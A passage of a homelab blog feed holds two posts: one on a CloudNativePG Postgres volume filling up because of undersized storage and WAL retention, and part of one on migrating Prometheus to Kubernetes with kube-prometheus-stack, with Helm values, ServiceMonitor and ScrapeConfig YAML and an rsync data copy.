      <description>Unhelpful error messages with a side of user error</description>
      <content:encoded><![CDATA[<p>I recently started migrating my <a href="https://grafana.com/">Grafana</a> instance from
Nomad to k8s and hit some very weird errors in the CloudNativePG DB after letting
it run for a short while.</p>
<p>This is an addendum to my <a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">previous post</a>
on <a href="https://cloudnative-pg.io/">CloudNativePG</a>.</p>
<h2 id="the-initial-issue">The initial issue</h2>
<p>The first issue came up during the initial setup of Grafana. A couple of minutes
after Grafana started running and writing data to the DB, the two database pods (primary and replica)
suddenly stopped working and just threw this error:</p>
<pre tabindex="0"><code>msg=&#34;DB not available, will retry&#34;
err=&#34;failed to connect to `host=/controller/run user=postgres database=postgres`: dial error (dial unix /controller/run/.s.PGSQL.5432: connect: no such file or directory)&#34;
</code></pre><p>Initially, I thought I had somehow screwed up my NetworkPolicy setup. But after
re-creating the CloudNativePG Cluster CR, it all worked again. I thought it was
a hiccup and returned to working on Grafana, but a couple of minutes into the
next Grafana deployment, the same issue happened again. And then again, after
another deletion and re-creation of the Cluster CR. The error was always the same.</p>
<p>What saved me in the end was a random look at my metrics dashboard, where I&rsquo;m
showing the following plot:</p>
<figure>
    <img loading="lazy" src="disk_full.png"
         alt="A screenshot of a gauge style Grafana panel. It shows the CSI volume utilization of the grafana-pg-cluster-1 storage volume. At 97.9%."/> <figcaption>
            <p>Yupp, it&rsquo;s full.</p>
        </figcaption>
</figure>

<p>So there I had it. I had simply made the volume for the Postgres DB storage too
small. Way too small, as it turns out. My Cluster manifest looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">grafana-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageName</span>: <span style="color:#e6db74">&#34;ghcr.io/cloudnative-pg/postgresql:16.2-10&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initdb</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">100M</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_connections</span>: <span style="color:#e6db74">&#34;20&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">shared_buffers</span>: <span style="color:#e6db74">&#34;25MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_cache_size</span>: <span style="color:#e6db74">&#34;75MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">maintenance_work_mem</span>: <span style="color:#e6db74">&#34;6400kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">checkpoint_completion_target</span>: <span style="color:#e6db74">&#34;0.9&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_buffers</span>: <span style="color:#e6db74">&#34;768kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">default_statistics_target</span>: <span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">random_page_cost</span>: <span style="color:#e6db74">&#34;1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_io_concurrency</span>: <span style="color:#e6db74">&#34;300&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">work_mem</span>: <span style="color:#e6db74">&#34;640kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">huge_pages</span>: <span style="color:#e6db74">&#34;off&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_wal_size</span>: <span style="color:#e6db74">&#34;128MB&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">256MB</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span></code></pre></div><p>While creating this config, I had looked at the size of the Grafana DB on my
Nomad instance, and it clocked in at around 35MB. So I wasn&rsquo;t really that worried.
But it seems I misunderstood some things. After changing the <code>storage.size</code> option
to <code>1GB</code>, everything was fine and the DB no longer crashed.</p>
<p>But that wasn&rsquo;t the end of my confusion when it came to the storage consumption.</p>
<h2 id="unbounded-growth-over-time">Unbounded growth over time?</h2>
<p>With the initial issue fixed, I set myself a task to check the disk usage of
the DB after a couple of days. This was during a week where I didn&rsquo;t have much
time to spend on the Homelab, so I expected the database size to not change
very much.</p>
<p>The result was this, after a week of not touching the Grafana instance, which
is the only user of the DB:</p>
<figure>
    <img loading="lazy" src="disk-growth.png"
         alt="A screenshot of a time series plot. It starts out a bit over 100MB usage and goes up to 300MB quickly. After that, it grows in steps approximately every six hours by about 100MB. It tops out at over 600 MB."/> <figcaption>
            <p>DB disk volume utilization growth.</p>
        </figcaption>
</figure>

<p>I couldn&rsquo;t understand what was going on here. It wasn&rsquo;t the database itself, which
stayed at just 12MB in size throughout the entire time. Then I looked at the disk
and saw this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>postgres@grafana-pg-cluster-1:/$ ls -lh /var/lib/postgresql/data/pgdata/pg_wal/
</span></span><span style="display:flex;"><span>total 561M
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  <span style="color:#ae81ff">338</span> Mar <span style="color:#ae81ff">17</span> 19:13 000000010000000000000003.00000028.backup
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 12:09 <span style="color:#ae81ff">000000010000000000000036</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 12:14 <span style="color:#ae81ff">000000010000000000000037</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 20:09 <span style="color:#ae81ff">000000010000000000000038</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 20:14 <span style="color:#ae81ff">000000010000000000000039</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 21:09 00000001000000000000003A
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 21:14 00000001000000000000003B
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 22:09 00000001000000000000003C
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 22:14 00000001000000000000003D
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 06:09 00000001000000000000003E
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 06:14 00000001000000000000003F
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 08:09 <span style="color:#ae81ff">000000010000000000000040</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 08:14 <span style="color:#ae81ff">000000010000000000000041</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 09:09 <span style="color:#ae81ff">000000010000000000000042</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 16:09 <span style="color:#ae81ff">000000010000000000000043</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 16:14 <span style="color:#ae81ff">000000010000000000000044</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 18:09 <span style="color:#ae81ff">000000010000000000000045</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 18:14 <span style="color:#ae81ff">000000010000000000000046</span>
</span></span><span style="display:flex;"><span>-rw-rw---- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 20:09 <span style="color:#ae81ff">000000010000000000000047</span>
</span></span><span style="display:flex;"><span>-rw-rw---- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 20:14 <span style="color:#ae81ff">000000010000000000000048</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 21:09 <span style="color:#ae81ff">000000010000000000000049</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 21:14 00000001000000000000004A
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 02:10 00000001000000000000004B
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 02:15 00000001000000000000004C
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 04:10 00000001000000000000004D
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 08:10 00000001000000000000004E
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 08:15 00000001000000000000004F
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 09:10 <span style="color:#ae81ff">000000010000000000000050</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 12:10 <span style="color:#ae81ff">000000010000000000000051</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 12:15 <span style="color:#ae81ff">000000010000000000000052</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 14:10 <span style="color:#ae81ff">000000010000000000000053</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 14:15 <span style="color:#ae81ff">000000010000000000000054</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 19:05 <span style="color:#ae81ff">000000010000000000000055</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 19:10 <span style="color:#ae81ff">000000010000000000000056</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 10:09 <span style="color:#ae81ff">000000010000000000000057</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 10:14 <span style="color:#ae81ff">000000010000000000000058</span>
</span></span><span style="display:flex;"><span>drwxrws--- <span style="color:#ae81ff">2</span> postgres tape 4.0K Mar <span style="color:#ae81ff">22</span> 19:10 archive_status
</span></span></code></pre></div><p>That at least explained where the space was going. Digging a bit into the
Postgres docs, I found the <a href="https://www.postgresql.org/docs/current/runtime-config-replication.html#GUC-WAL-KEEP-SIZE">wal_keep_size</a> config option, which determines how much WAL is kept
around. Looking a bit further, because I certainly hadn&rsquo;t set that option myself, I finally
came across CloudNativePG&rsquo;s default config. And in there, <code>wal_keep_size</code> is set
to 512MB, which happens to fit the point where the DB volume stopped growing.
See the CloudNativePG docs <a href="https://cloudnative-pg.io/documentation/current/postgresql_conf/#the-postgresql-section">here</a>.</p>
<p>Still, this seems a bit excessive to me, considering that the database itself
is only 12MB. But at least now I know to add 512MB to the storage volume size
to account for the Write-Ahead Log.</p>
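<p>I haven&rsquo;t tried it, but if the 512MB bothers you, it should presumably be possible to
lower the value via the Cluster&rsquo;s <code>postgresql.parameters</code>, just like the other Postgres
settings, at the cost of keeping less WAL around for the replica:</p>
<pre tabindex="0"><code>  postgresql:
    parameters:
      wal_keep_size: &#34;128MB&#34;
</code></pre>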
<p>I&rsquo;m still surprised how much WAL is produced here, even though I&rsquo;m pretty sure
that there isn&rsquo;t actually that much going on in the database.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 9: Prometheus</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-9-prometheus/</link>
      <pubDate>Fri, 15 Mar 2024 00:30:16 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-9-prometheus/</guid>
      <description>Setting up Prometheus with kube-prometheus-stack</description>
      <content:encoded><![CDATA[<p>Wherein I set up Prometheus for metrics gathering in the k8s cluster.</p>
<p>This is part 10 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>Let me tell you something about me: I love metrics. And pretty charts. The more
the better. Back in 2020, setting up Prometheus+Grafana was what brought me
to Homelabbing as a hobby, instead of just a means to an end, running some
services I wanted to use.
I had just gotten an updated ISP connection and found my old FritzBox not working
anymore. Instead of just buying a newer one, I decided to try out OPNsense.
This meant that I now had two hosts in the Homelab. My old home server running
a handful of services, and the new OPNsense box. And I wanted metrics, especially
about CPU and network usage.</p>
<p>Today, my Prometheus database takes about 50 GB on disk and I&rsquo;ve got a retention
period of five years. &#x1f605;
It&rsquo;s not just host metrics anymore. I&rsquo;m also scraping thermometers and smart
plugs to monitor my home a bit.</p>
<p>One of the main things I&rsquo;m using my monitoring stack for is to analyze changes
in the noise level. My desk is right next to my server rack. And sometimes,
fans suddenly ramp up, or hard disks start seeking without me doing anything.
Then I like the ability to go to my Homelab dashboard and immediately identify
which service is likely responsible for that increase in the noise level.</p>
<p>In this post, I will go over the migration of my Prometheus setup to k8s. I
will also migrate Grafana, but to keep the post relatively short, I decided to
split the Prometheus and Grafana posts instead of handling the entire monitoring
migration in one go.</p>
<h2 id="setup">Setup</h2>
<p>For the monitoring deployment, I decided to use <a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>, which I was pointed to
by multiple Homelabbers on the Fediverse while working on my first test cluster.
It is a Helm chart which is able to deploy a full monitoring stack for k8s and
contains multiple components.</p>
<p>The first component deployed is an instance of <a href="https://github.com/prometheus-operator/prometheus-operator">prometheus-operator</a>.
This operator&rsquo;s main task is to deploy one (or several) Prometheus instances.
It also supplies a number of CRDs to configure scraping for those Prometheus
instances with Kubernetes manifests, instead of manipulating the Prometheus
config file directly. The two main CRDs are <a href="https://prometheus-operator.dev/docs/operator/design/#servicemonitor">ServiceMonitors</a> and <a href="https://prometheus-operator.dev/docs/user-guides/scrapeconfig/">ScrapeConfigs</a>.
The ServiceMonitor in particular seems to be the more widely accepted way
of configuring service scraping. I&rsquo;ve already seen the ability to create
ServiceMonitors in several Helm Charts I have deployed, e.g. Ceph Rook&rsquo;s. This
way, you don&rsquo;t have to create scrape configs manually.</p>
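<p>Just to illustrate the idea, here is a minimal sketch of what such a ServiceMonitor
could look like. The names and the port are made up and not taken from any of my
actual deployments:</p>
<pre tabindex="0"><code>apiVersion: monitoring.coreos.com/v1
kind: ServiceMonitor
metadata:
  name: example-app
spec:
  # Select the Service(s) to scrape via their labels
  selector:
    matchLabels:
      app: example-app
  endpoints:
    # 'metrics' needs to be the name of a port on the selected Service
    - port: metrics
      interval: 30s
</code></pre><p>The operator watches for these resources and generates the corresponding scrape
config for every Service matching the selector.</p>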
<p>The next component deployed by the Helm chart is <a href="https://github.com/kubernetes/kube-state-metrics">kube-state-metrics</a>.
This is a component which scrapes the Kubernetes apiserver and supplies a lot
of additional information about the state of the cluster, for example detailed
info about Pods or Deployments.</p>
<p>Finally, the Helm chart can also deploy and properly configure Grafana, and
comes with a number of pre-defined dashboards for the data scraped from the
cluster. I will skip this component for now and take it up in the next post in
this series, when I&rsquo;m migrating my Grafana instance.</p>
<p>Before going on to the <code>values.yaml</code>, I also need to talk about the necessary
config for Kubernetes components. By default, most components in a <em>kubeadm</em>
cluster only listen on localhost. Most components&rsquo; metrics were not too
interesting, with the Kube Scheduler as an exception. To make it available
for Prometheus scraping, I added the following to my <a href="https://kubernetes.io/docs/reference/config-api/kubeadm-config.v1beta3/#kubeadm-k8s-io-v1beta3-ClusterConfiguration">ClusterConfiguration</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">scheduler</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraArgs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">bind-address</span>: <span style="color:#ae81ff">0.0.0.0</span>
</span></span></code></pre></div><p>I disabled the scraping for the Kube Controller Manager completely, because the
metrics from it didn&rsquo;t look interesting enough to bother changing the config
after I had already set up the cluster.</p>
<p>Here is the full <code>values.yaml</code> file for the kube-prometheus-stack chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">crds</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">commonLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">monitoring</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">defaultRules</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">create</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">windowsMonitoring</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">alertmanager</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">grafana</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kubeProxy</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kubeEtcd</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kubeControllerManager</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">nodeExporter</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">prometheusOperator</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">networkPolicy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">flavor</span>: <span style="color:#ae81ff">cilium</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">logFormat</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">prometheus</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">networkPolicy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">flavor</span>: <span style="color:#ae81ff">cilium</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cilium</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">prometheus.example.com</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selfMonitor</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">prometheusSpec</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scrapeInterval</span>: <span style="color:#ae81ff">30s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retention</span>: <span style="color:#ae81ff">5y</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">logLevel</span>: <span style="color:#ae81ff">debug</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">logFormat</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scrapeConfigSelectorNilUsesHelmValues</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">150m</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">700Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">900Mi</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageSpec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumeClaimTemplate</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rbd-bulk</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">accessModes</span>: [<span style="color:#e6db74">&#34;ReadWriteOnce&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">100Gi</span>
</span></span></code></pre></div><p>The first thing to note here is that I&rsquo;m disabling a lot of functionality.
The first one is all alerting features. I don&rsquo;t have alerting set up on my Nomad
cluster either, but I&rsquo;ve had it on my list for a long time. I will get to it
at some point. &#x1f642;</p>
<p>Next is that I&rsquo;m keeping Grafana disabled as well. For now I will use my Nomad
Grafana instance. The migration of Grafana will come in the next step.</p>
<p>Then I&rsquo;m disabling scraping of the Kubernetes proxy, because I&rsquo;ve got that
component disabled, using Cilium instead. Further, I&rsquo;ve got etcd and the Kube
Controller Manager also disabled, because I did not see anything interesting in
their metrics.
Finally, the node-exporter functionality of the chart is also disabled, because
I&rsquo;m already deploying it via Ansible on all of my nodes. And because I&rsquo;ve got
nodes, like my OPNsense box, which don&rsquo;t run Kubernetes, I decided to keep
the node-exporter config in Ansible, on the node level. This way, there is
a common config for all hosts in the Homelab, instead of having some hosts
configured via Ansible and some via this Helm chart.</p>
<p>I&rsquo;ve currently got an Ingress configured for Prometheus. This is only temporary,
while I&rsquo;m still using the Grafana deployment on Nomad. After that&rsquo;s migrated to
Kubernetes as well, there will no longer be any need for it.</p>
<p>One important thing to point out is the <code>prometheus.prometheusSpec.scrapeConfigSelectorNilUsesHelmValues</code>
option. Left at its default, the Prometheus operator will only look at
ScrapeConfig resources deployed by the Helm chart itself. Setting it to <code>false</code>
lets it also pick up ScrapeConfigs created separately, which is what I wanted (see next section).</p>
<p>Finally, I would like to leave a couple of lines here about the data migration.
As I noted above, I like pretty charts. And I like to have access to older data
as well, which is why I&rsquo;ve got a retention period of five years for Prometheus.
I was a bit apprehensive about how well the migration would go. But it turns
out that Prometheus is absolutely fine when just copying over the files from
another Prometheus instance.</p>
<p>I just copied the data files from my old Prometheus volume over to the new one
with a <code>rsync -avP /mnt/old-volume/* /mnt/new-volume/prometheus-db/</code>. The
permissions/ownership of the files don&rsquo;t seem to matter much; the new
Prometheus instance was fine handling the old ownership of the files upon
restart.</p>
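<p>One way to get both volumes mounted side by side for such a copy, assuming both
are available as PVCs in the cluster, is a throwaway Pod along these lines (the
claim names and the namespace are placeholders, not my actual ones):</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Pod
metadata:
  name: prom-data-copy
  namespace: monitoring
spec:
  containers:
    - name: copy
      image: alpine:3.19
      # Just sleep, so the copy can be run manually via kubectl exec
      command: ["sleep", "86400"]
      volumeMounts:
        - name: old-volume
          mountPath: /mnt/old-volume
        - name: new-volume
          mountPath: /mnt/new-volume
  volumes:
    - name: old-volume
      persistentVolumeClaim:
        claimName: old-prometheus-data        # placeholder
    - name: new-volume
      persistentVolumeClaim:
        claimName: prometheus-db-prometheus-0 # placeholder
</code></pre><p>With Prometheus scaled down so the ReadWriteOnce volume is actually free, a
<code>kubectl exec</code> into this Pod and the rsync from above (or a plain <code>cp -a</code>)
then does the copy between the two mount points.</p>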
<h2 id="scraping">Scraping</h2>
<p>And now onto the scrape configs. In good Kubernetes style, you don&rsquo;t just create
a Prometheus config file. Instead, scrapes are configured via ServiceMonitors
and ScrapeConfigs. I won&rsquo;t go into detail on the ServiceMonitor here, as I don&rsquo;t
directly use any of it yet - it is only used behind the scenes to configure
scraping for the Kubernetes components.</p>
<p>But I did need to introduce some ScrapeConfigs to configure the k8s Prometheus
instance so that it would scrape all the targets the old instance was scraping.</p>
<p>As an example of what this looks like, here is a ScrapeConfig for the node-exporter
running on all of my hosts:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScrapeConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scraping-hosts</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheus</span>: <span style="color:#ae81ff">scrape-hosts</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">staticConfigs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">labels</span>:
